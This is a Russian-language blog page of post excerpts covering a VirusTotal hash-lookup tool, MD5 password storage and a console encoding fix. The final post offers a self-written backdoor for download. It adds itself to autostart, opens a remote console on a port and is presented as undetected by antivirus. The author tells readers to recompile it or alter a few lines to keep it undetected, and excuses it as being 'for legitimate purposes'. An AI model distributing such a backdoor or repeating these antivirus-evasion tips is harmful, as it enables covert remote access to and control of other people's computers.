После того, как я начал юзать загрузчик вирустотал, я понял, что в некоторых случаях мне лень грузить 10-20 метров туда, так как у меня на отдачу всего 512 Кбит..
.

Кнопочка Hash Search мне как бы намекала, что можно искать по хешу файла, и наблюдать результат проверки, на момент заливки этого файла. Вариант не 100%-й, за прошедшее время могли найти кучу вирусов, и очень подозрительные файлы лучше заливать самому. Кроме того, проверка хеша помогает проверить, не заливали ли ваш софт туда (что я и сделал – http://mrthe.name/2009/08/simple-backdoor-by-mrthe/, оказалось – заливали).
.

И так, ближе к делу – я, в качестве практики написал маленькую Open Source тулзу, которая считает md5 хеш файла, и отправляет его на вирус-тотал.

(далее…)

Рано или поздно все задумываются о хранении паролей пользователей. Многие останавливаются на алгоритме md5. Двойном md5, солёном md5 (salt md5) и других его разновидностях… Да, хорошая, длинная соль(salt) и не стандартная комбинация пароль+соль+md5 делает хеш достаточно сложным, что бы его нельзя было найти в базах. Но, если ваш сайт\сервер будет взломан, и будет получен доступ к базе данных и к файлам – брутфорс паролей не станет проблемой.
.
Как же с этим бороться?
.
(далее…)

Нужно было получить информацию о выполнении команды, с помощью popen, вывести её и записать в файл. Но если выводилась она нормально, то в файле вместо русских символов были кракозябры. SetLocale и прочие извращения не помогали.  Пробовал CharToOem,  не помогло.. А OemToChar помогла! Это вам не php, тут ещё интереснее ж)

Написал простой бэкдор. Автоматически прописывается в автозагрузку, и даёт доступ к консоли на указанном порту. Не палиться антивирусами. (UPD: кто-то очень умный, залил его на вирус-тотал. Теперь, он палиться чуть-ли не каждым антивирусом. Этому человеку, я хочу сказать «спасибо», а всем желающим юзать не палящийся софт – перекомпилируйте его на другом компиляторе, либо измените пару строк в коде, что бы он не палился. У меня уже есть чистая версия, так что, ничего сложного в этом нет.)  Поддерживает русский язык и авторизацию по паролю.
Для коннекта советую использовать PuTTy. Имеет открытый исходный код!
.
Скачать это добро можно здесь –  http://mrthe.name/trash/BackDoor.rar, в архиве исходник(компилируется с помощью mingw gcc) и рабочий пример сжатый UPX’ом, который принимает коннекты на 4321-й порт. А как выглядит пароль – можно посмотреть в исходнике.
.
И сразу должен сообщить – код не претендует на красоту и оптимальность. Писал в качестве практики и только для законных целей – удобное управление парком машин с любой оси, вплоть до телефонов с J2ME.

(далее…)